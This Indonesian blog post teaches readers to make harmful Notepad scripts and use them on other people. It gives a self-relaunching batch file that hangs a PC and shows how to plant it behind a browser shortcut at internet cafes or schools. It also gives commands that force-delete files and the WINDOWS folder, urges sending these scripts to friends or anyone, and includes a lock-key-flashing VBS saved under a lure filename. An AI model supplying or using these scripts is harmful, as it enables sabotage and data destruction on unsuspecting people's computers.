Fungsi Lain Notepad

Fungsi Lain Notepad

Fungsi Lain Notepad

Fungsi Lain Notepad
Fungsi Lain Notepad

Fungsi lain Notepad
_______________________________________________

Membuat hang pc orang dengan menggunakan notepad.

Buka notepad terus tulis start terus tekan enter terus tekan start lagi terus enter lagi sampai berulang-ulang. Kalau udah simpan extensi .bat misalnya hang.bat
Sekarang coba buka file hang.bat tadi,pasti akan keluar jendela CMD banyak sekali.
sekarang buka notepad kembali dan openfile ke hang.bat tadi, sekarang kamu ke kursor paling bawah tadi trus tekan enter dan tulis hang.bat

contohnya gini :

start
start
start
start
start
start
start
start
start

hack.bat

kalau udah save filenya terus buka filenya, nanti komputer kamu pasti akan hang,dan jalan satu-satunya benerin adalah dengan merestart komputer…
wow…keren kan????
Trik ini sangat seru untuk mengerjain komputer orang. Misalnya ngerjain komputer di warnet atau sekolahan, caranya gini
misalnya di deskkop ada icon mozilla terus kamu klik kanan icon itu lalu pilih properties. Setelah itu taget filenya ganti ke file hang.bat tadi
misalnya file hack.bat kamu tadi kamu simpan di drive C, jadi nanti targetnya jadi C:\hang.bat
Nanti kalau ada orang yang mau browsing dan mengklik mozilla tadi otomatis dia akan buka file hang.bat tadi, sehingga otomatis komputernya akan hang dan harus di restart.

met nyobain deh…

Ngerjain pc orang lain pake notepad

Ngerjain orang lain pake Notepad

Ingat !
Jangan Disalah Gunakan… Ini cuman Buat isengPusing

Notepad adalah senjata Ampuh
gunakan notepad sebagai senjata kalian untuk ngerjain orang lain.

Menghapus Files dan Folder

1. Buka notepad terus ketik DEL /F /Q *
2. Save as dan simpan dengan nama test.cmd
3. Kalau anda dobel klik file test.cmd maka semua files dan folder akan terhapus.

Menghapus Files Tertentu

1. Buka notepad terus ketik erase C:TEST.txt
2. Save as dan simpan dengan nama test.cmd
3. Kalau anda dobel klik file test.cmd maka files TEST.txt di drive c:\ akan terhapus

Menghapus Folder Tertentu

1. Buka notepad terus ketik erase C:WINDOWS
2. Save as dan simpan dengan nama test.cmd
3. Kalau anda dobel klik file test.cmd maka folder WINDOWS di drive c:\ akan terhapus

Nah kalo sudah jadi, tinggal kalian kirim aja ke temen kalian, ato siapapun. simple tapi “merugikan”:

Gue tambahin lagi ni..:

mighty_child
Code:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

1. Copy paste code di notepad
2. Save as asiaporn.vbs – save as sebagai “All Files” bukan text
3. Klik 2 kali terus tinggal aja PCnya

Sumber : https://chicagobearsjerseyspop.com/